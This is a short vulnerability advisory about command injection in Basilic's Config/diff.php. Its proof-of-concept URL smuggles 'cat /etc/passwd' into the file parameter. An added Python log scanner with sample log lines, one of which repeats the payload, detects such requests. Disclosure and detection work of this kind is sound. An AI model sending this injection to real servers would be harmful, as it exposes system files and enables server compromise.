Basilic Remote Command Execution

2012-06-30T00:00:00
ID PACKETSTORM:114368
Type packetstorm
Reporter M.Razavi
Modified 2012-06-30T00:00:00

Description

                                        
Hi  
Dear Sir  
  
Basilic is an Automated Bibliography Server for Research Publications Diffusion that is used by many research centers.  
There is an RCE bug in basilic/Config/diff.php that could allow an attacker to run system commands on the server.  
Sample:  
http://127.0.0.1/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2  
  
Regards  
M.Razavi  
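
A log check for the request pattern in the sample above, added here as an example and not part of the original advisory or of Basilic's code: it flags access-log requests to Config/diff.php whose file, new or old parameters decode to shell metacharacters. The combined log format, the metacharacter set and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script path from the advisory; matched case-insensitively under any install prefix.
TARGET = re.compile(r"/Config/diff\.php$", re.IGNORECASE)
# Characters a shell interprets. Assumption: legitimate values never contain them.
SHELL_META = re.compile(r"[&|;`$<>(){}\\\n\r'\"]")
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Parameters that appear in the advisory's sample URL.
PARAMS = ("file", "new", "old")


def suspicious_params(url):
    """Return {param: decoded value} for diff.php params holding shell metacharacters."""
    parts = urlsplit(url)
    if not TARGET.search(parts.path):
        return {}
    query = parse_qs(parts.query, keep_blank_values=True)
    hits = {}
    for name in PARAMS:
        for value in query.get(name, []):
            # parse_qs decodes once; decode again to catch double-encoded input.
            if SHELL_META.search(value) or SHELL_META.search(unquote(value)):
                hits[name] = value
    return hits


def scan(lines):
    """Yield (line_number, hits) for each log line that requests diff.php suspiciously."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            hits = suspicious_params(match.group(1))
            if hits:
                yield number, hits


# Constructed sample log lines (not real traffic); line 2 carries the advisory's sample URL.
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jun/2012:10:00:00 +0000] "GET /basilic/Config/diff.php?file=config.php&new=1&old=2 HTTP/1.1" 200 512',
    '192.0.2.77 - - [30/Jun/2012:10:01:00 +0000] "GET /basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2 HTTP/1.1" 200 2048',
    '192.0.2.10 - - [30/Jun/2012:10:02:00 +0000] "GET /basilic/index.php?q=a%26b HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, hits)
```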